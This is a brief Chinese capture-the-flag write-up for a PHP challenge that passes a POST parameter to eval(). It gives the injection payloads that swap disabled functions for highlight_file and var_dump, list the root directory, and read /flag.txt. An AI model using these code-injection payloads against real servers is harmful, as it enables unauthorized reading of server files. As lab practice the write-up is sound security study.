1. 代码审计,跟原来没什么区别 

      1. <?php
      2. // 你们在炫技吗?
      3. if(isset($_POST['c'])){
      4.     $c= $_POST['c'];
      5.     eval($c);
      6. }else{
      7. highlight_file(__FILE__);
      8. }

    2. 这里show_source被禁用掉了,我们换成highlight_file发现flag不在这里 

      c=highlight_file("flag.php");

    3. scandir搜索一下根目录,发现print_r被禁用了替换成var_dump一个道理,发现flag.txt 

      c=var_dump(scandir("/"));

    4. 构造payload 

      c=highlight_file("/flag.txt");